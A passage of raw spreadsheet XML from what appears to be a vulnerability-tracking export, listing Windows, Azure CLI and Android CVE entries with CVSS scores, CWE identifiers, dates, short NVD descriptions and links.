t="inlineStr"><is><t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T398" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69762</t></is></c></row><row r="399"><c r="A399" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B399" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C399" s="5" t="inlineStr"><is><t>CVE-2026-69773</t></is></c><c r="D399" s="5" t="n"><v>8</v></c><c r="E399" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F399" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G399" s="5" t="inlineStr" /><c r="H399" s="5" t="n"><v>0.007</v></c><c r="I399" s="5" t="inlineStr" /><c r="J399" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K39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399" s="5" t="inlineStr" /><c r="M399" s="5" t="inlineStr" /><c r="N399" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O399" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P399" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q399" s="5" t="inlineStr" /><c r="R399" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S399" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T399" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t></is></c></row><row r="400"><c r="A400" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B400" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C400" s="5" t="inlineStr"><is><t>CVE-2026-69777</t></is></c><c r="D400" s="5" t="n"><v>8</v></c><c r="E400" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F400" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G400" s="5" t="inlineStr" /><c r="H400" s="5" t="n"><v>0.005</v></c><c r="I400" s="5" t="inlineStr" /><c r="J400" s="5" t="inlineStr" /><c r="K400" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L400" s="5" t="inlineStr" /><c r="M400" s="5" t="inlineStr" /><c r="N400" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O400" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P400" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q400" s="5" t="inlineStr" /><c r="R400" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S400" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Client allows an authorized attacker to elevate privileges over an adjacent network.</t></is></c><c r="T400" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69777</t></is></c></row><row r="401"><c r="A401" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B401" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C401" s="5" t="inlineStr"><is><t>CVE-2026-69807</t></is></c><c r="D401" s="5" t="n"><v>8</v></c><c r="E401" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F401" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G401" s="5" t="inlineStr" /><c r="H401" s="5" t="n"><v>0.008999999999999999</v></c><c r="I401" s="5" t="inlineStr" /><c r="J401" s="5" t="inlineStr" /><c r="K401" s="5" t="inlineStr" /><c r="L401" s="5" t="inlineStr" /><c r="M401" s="5" t="inlineStr" /><c r="N401" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O401" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P401" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q401" s="5" t="inlineStr" /><c r="R401" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S401" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T401" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69807</t></is></c></row><row r="402"><c r="A402" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B402" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C402" s="5" t="inlineStr"><is><t>CVE-2026-69826</t></is></c><c r="D402" s="5" t="n"><v>8</v></c><c r="E402" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F402" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G402" s="5" t="inlineStr" /><c r="H402" s="5" t="n"><v>0.007</v></c><c r="I402" s="5" t="inlineStr" /><c r="J402" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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02" s="5" t="inlineStr" /><c r="M402" s="5" t="inlineStr" /><c r="N402" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O402" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P402" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q402" s="5" t="inlineStr" /><c r="R402" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S402" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T402" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69826</t></is></c></row><row r="403"><c r="A403" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B403" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C403" s="5" t="inlineStr"><is><t>CVE-2026-69847</t></is></c><c r="D403" s="5" t="n"><v>8</v></c><c r="E403" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F403" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G403" s="5" t="inlineStr" /><c r="H403" s="5" t="n"><v>0.005</v></c><c r="I403" s="5" t="inlineStr" /><c r="J403" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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03" s="5" t="inlineStr" /><c r="M403" s="5" t="inlineStr" /><c r="N403" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O403" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P403" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q403" s="5" t="inlineStr" /><c r="R403" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S403" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t></is></c><c r="T403" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69847</t></is></c></row><row r="404"><c r="A404" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B404" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C404" s="5" t="inlineStr"><is><t>CVE-2026-69875</t></is></c><c r="D404" s="5" t="n"><v>8</v></c><c r="E404" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F404" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G404" s="5" t="inlineStr" /><c r="H404" s="5" t="n"><v>0.008</v></c><c r="I404" s="5" t="inlineStr" /><c r="J404" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K404"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404" s="5" t="inlineStr" /><c r="M404" s="5" t="inlineStr" /><c r="N404" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O404" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P404" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q404" s="5" t="inlineStr" /><c r="R404" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S404" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T404" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69875</t></is></c></row><row r="405"><c r="A405" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B405" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C405" s="5" t="inlineStr"><is><t>CVE-2026-69876</t></is></c><c r="D405" s="5" t="n"><v>8</v></c><c r="E405" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F405" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G405" s="5" t="inlineStr" /><c r="H405" s="5" t="n"><v>0.006</v></c><c r="I405" s="5" t="inlineStr" /><c r="J405" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K405" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L405" s="5" t="inlineStr" /><c r="M405" s="5" t="inlineStr" /><c r="N405" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O405" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P405" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q405" s="5" t="inlineStr" /><c r="R405" s="5" t="inlineStr"><is><t>CWE-415, CWE-416</t></is></c><c r="S405" s="5" t="inlineStr"><is><t>Use after free in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t></is></c><c r="T405" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69876</t></is></c></row><row r="406"><c r="A406" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B406" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C406" s="5" t="inlineStr"><is><t>CVE-2026-83948</t></is></c><c r="D406" s="5" t="n"><v>8</v></c><c r="E406" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F406" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G406" s="5" t="inlineStr" /><c r="H406" s="5" t="n"><v>0.004</v></c><c r="I406" s="5" t="inlineStr" /><c r="J406" s="5" t="inlineStr" /><c r="K406" s="5" t="inlineStr"><is><t>microsoft:vm_repair</t></is></c><c r="L406" s="5" t="inlineStr" /><c r="M406" s="5" t="inlineStr" /><c r="N406" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O406" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P406" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q406" s="5" t="inlineStr" /><c r="R406" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="S406" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in a command ('command injection') in Microsoft Azure CLI allows an authorized attacker to execute code over a network.</t></is></c><c r="T406" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83948</t></is></c></row><row r="407"><c r="A407" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B407" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C407" s="5" t="inlineStr"><is><t>CVE-2026-0065</t></is></c><c r="D407" s="5" t="n"><v>7.8</v></c><c r="E407" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F407" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G407" s="5" t="inlineStr" /><c r="H407" s="5" t="n"><v>0.001</v></c><c r="I407" s="5" t="inlineStr" /><c r="J407" s="5" t="inlineStr" /><c r="K407" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L407" s="5" t="inlineStr" /><c r="M407" s="5" t="inlineStr" /><c r="N407" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O407" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P407" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q407" s="5" t="inlineStr" /><c r="R407" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S407" s="5" t="inlineStr"><is><t>In areBackgroundActivityStartsAllowed of BackgroundLaunchProcessController.java, there is a possible unintended way to launch activities in the background due to a logic error in the code. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T407" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0065</t></is></c></row><row r="408"><c r="A408" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B408" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C408" s="5" t="inlineStr"><is><t>CVE-2026-0084</t></is></c><c r="D408" s="5" t="n"><v>7.8</v></c><c r="E408" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F408" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G408" s="5" t="inlineStr" /><c r="H408" s="5" t="n"><v>0.001</v></c><c r="I408" s="5" t="inlineStr" /><c r="J408" s="5" t="inlineStr" /><c r="K408" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L408" s="5" t="inlineStr" /><c r="M408" s="5" t="inlineStr" /><c r="N408" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O408" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P408" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q408" s="5" t="inlineStr" /><c r="R408" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S408" s="5" t="inlineStr"><is><t>In multiple functions of HostEmulationManager.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T408" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0084</t></is></c></row><row r="409"><c r="A409" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B409" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C409" s="5" t="inlineStr"><is><t>CVE-2026-28572</t></is></c><c r="D409" s="5" t="n"><v>7.8</v></c><c r="E409" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F409" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G409" s="5" t="inlineStr" /><c r="H409" s="5" t="n"><v>0.001</v></c><c r="I409" s="5" t="inlineStr" /><c r="J409" s="5" t="inlineStr" /><c r="K409" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L409" s="5" t="inlineStr" /><c r="M409" s="5" t="inlineStr" /><c r="N409" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O409" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P409" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q409" s="5" t="inlineStr" /><c r="R409" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S409" s="5" t="inlineStr"><is><t>In onCreate of InstallLaunch.kt, there is a possible misleading UI due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T409" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28572</t></is></c></row><row r="410"><c r="A410" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B410" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C410" s="5" t="inlineStr"><is><t>CVE-2026-28583</t></is></c><c r="D410" s="5" t="n"><v>7.8</v></c><c r="E410" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F410" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G410" s="5" t="inlineStr" /><c r="H410" s="5" t="n"><v>0.001</v></c><c r="I410" s="5" t="inlineStr" /><c r="J410" s="5" t="inlineStr" /><c r="K410" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L410" s="5" t="inlineStr" /><c r="M410" s="5" t="inlineStr" /><c r="N410" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O410" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P410" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q410" s="5" t="inlineStr" /><c r="R410" s="5" t="inlineStr"><is><t>CWE-693, CWE-787</t></is></c><c r="S410" s="5" t="inlineStr"><is><t>In validate_camera_metadata_structure of camera_metadata.c, there is a possible out of bounds write due to a logical error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T410" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28583</t></is></c></row><row r="411"><c r="A411" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B411" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C411" s="5" t="inlineStr"><is><t>CVE-2026-28590</t></is></c><c r="D411" s="5" t="n"><v>7.8</v></c><c r="E411" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F411" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G411" s="5" t="inlineStr" /><c r="H411" s="5" t="n"><v>0.001</v></c><c r="I411" s="5" t="inlineStr" /><c r="J411" s="5" t="inlineStr" /><c r="K411" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L411" s="5" t="inlineStr" /><c r="M411" s="5" t="inlineStr" /><c r="N411" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O411" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P411" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q411" s="5" t="inlineStr" /><c r="R411" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S411" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible improper encryption key validation due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T411" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28590</t></is></c></row><row r="412"><c r="A412" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B412" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C412" s="5" t="inlineStr"><is><t>CVE-2026-28593</t></is></c><c r="D412" s="5" t="n"><v>7.8</v></c><c r="E412" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F412" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G412" s="5" t="inlineStr" /><c r="H412" s="5" t="n"><v>0.001</v></c><c r="I412" s="5" t="inlineStr" /><c r="J412" s="5" t="inlineStr" /><c r="K412" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L412" s="5" t="inlineStr" /><c r="M412" s="5" t="inlineStr" /><c r="N412" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O412" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P412" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q412" s="5" t="inlineStr" /><c r="R412" s="5" t="inlineStr"><is><t>CWE-356</t></is></c><c r="S412" s="5" t="inlineStr"><is><t>In getItemList of SettingsFragment.java, there is a possible user interaction bypass due to misleading or insufficient UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T412" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28593</t></is></c></row><row r="413"><c r="A413" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B413" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C413" s="5" t="inlineStr"><is><t>CVE-2026-28594</t></is></c><c r="D413" s="5" t="n"><v>7.8</v></c><c r="E413" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F413" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G413" s="5" t="inlineStr" /><c r="H413" s="5" t="n"><v>0.001</v></c><c r="I413" s="5" t="inlineStr" /><c r="J413" s="5" t="inlineStr" /><c r="K413" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L413" s="5" t="inlineStr" /><c r="M413" s="5" t="inlineStr" /><c r="N413" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O413" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P413" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q413" s="5" t="inlineStr" /><c r="R413" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S413" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T413" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28594</t></is></c></row><row r="414"><c r="A414" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B414" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C414" s="5" t="inlineStr"><is><t>CVE-2026-28599</t></is></c><c r="D414" s="5" t="n"><v>7.8</v></c><c r="E414" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F414" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G414" s="5" t="inlineStr" /><c r="H414" s="5" t="n"><v>0.001</v></c><c r="I414" s="5" t="inlineStr" /><c r="J414" s="5" t="inlineStr" /><c r="K414" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L414" s="5" t="inlineStr" /><c r="M414" s="5" t="inlineStr" /><c r="N414" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O414" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P414" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q414" s="5" t="inlineStr" /><c r="R414" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S414" s="5" t="inlineStr"><is><t>In addCreatorToken of ActivityManagerService.java, there is a possible Intent Redirection Bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T414" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28599</t></is></c></row><row r="415"><c r="A415" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B415" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C415" s="5" t="inlineStr"><is><t>CVE-2026-28600</t></is></c><c r="D415" s="5" t="n"><v>7.8</v></c><c r="E415" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F415" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G415" s="5" t="inlineStr" /><c r="H415" s="5" t="n"><v>0.001</v></c><c r="I415" s="5" t="inlineStr" /><c r="J415" s="5" t="inlineStr" /><c r="K415" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L415" s="5" t="inlineStr" /><c r="M415" s="5" t="inlineStr" /><c r="N415" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O415" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P415" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q415" s="5" t="inlineStr" /><c r="R415" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S415" s="5" t="inlineStr"><is><t>In onCreate of PaymentDefaultDialog.java, there is a possible way to change default payment app due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T415" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28600</t></is></c></row><row r="416"><c r="A416" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B416" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C416" s="5" t="inlineStr"><is><t>CVE-2026-28602</t></is></c><c r="D416" s="5" t="n"><v>7.8</v></c><c r="E416" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F416" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G416" s="5" t="inlineStr" /><c r="H416" s="5" t="n"><v>0.001</v></c><c r="I416" s="5" t="inlineStr" /><c r="J416" s="5" t="inlineStr" /><c r="K416" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L416" s="5" t="inlineStr" /><c r="M416" s="5" t="inlineStr" /><c r="N416" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O416" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P416" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q416" s="5" t="inlineStr" /><c r="R416" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S416" s="5" t="inlineStr"><is><t>In setClipboardAccessNotificationsEnabledForUser of ClipboardService.java, there is a possible mult-iuser isolation due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T416" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28602</t></is></c></row><row r="417"><c r="A417" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B417" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C417" s="5" t="inlineStr"><is><t>CVE-2026-28603</t></is></c><c r="D417" s="5" t="n"><v>7.8</v></c><c r="E417" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F417" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G417" s="5" t="inlineStr" /><c r="H417" s="5" t="n"><v>0.001</v></c><c r="I417" s="5" t="inlineStr" /><c r="J417" s="5" t="inlineStr" /><c r="K417" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L417" s="5" t="inlineStr" /><c r="M417" s="5" t="inlineStr" /><c r="N417" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O417" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P417" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q417" s="5" t="inlineStr" /><c r="R417" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S417" s="5" t="inlineStr"><is><t>In assertSafeToStartCustomActivity of AppRestrictionsFragment.java, there is a possible read/write access to private files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T417" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28603</t></is></c></row><row r="418"><c r="A418" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B418" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C418" s="5" t="inlineStr"><is><t>CVE-2026-28607</t></is></c><c r="D418" s="5" t="n"><v>7.8</v></c><c r="E418" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F418" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G418" s="5" t="inlineStr" /><c r="H418" s="5" t="n"><v>0.001</v></c><c r="I418" s="5" t="inlineStr" /><c r="J418" s="5" t="inlineStr" /><c r="K418" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L418" s="5" t="inlineStr" /><c r="M418" s="5" t="inlineStr" /><c r="N418" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O418" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P418" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q418" s="5" t="inlineStr" /><c r="R418" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S418" s="5" t="inlineStr"><is><t>In multiple functions in multiple locations, there is a possible background activity launch bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T418" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28607</t></is></c></row><row r="419"><c r="A419" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B419" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C419" s="5" t="inlineStr"><is><t>CVE-2026-28611</t></is></c><c r="D419" s="5" t="n"><v>7.8</v></c><c r="E419" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F419" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G419" s="5" t="inlineStr" /><c r="H419" s="5" t="n"><v>0.001</v></c><c r="I419" s="5" t="inlineStr" /><c r="J419" s="5" t="inlineStr" /><c r="K419" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L419" s="5" t="inlineStr" /><c r="M419" s="5" t="inlineStr" /><c r="N419" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O419" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P419" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q419" s="5" t="inlineStr" /><c r="R419" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S419" s="5" t="inlineStr"><is><t>In multiple functions of NfcService.java, there is a possible silent payment session hijacking enablement due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T419" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28611</t></is></c></row><row r="420"><c r="A420" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B420" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C420" s="5" t="inlineStr"><is><t>CVE-2026-28612</t></is></c><c r="D420" s="5" t="n"><v>7.8</v></c><c r="E420" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c 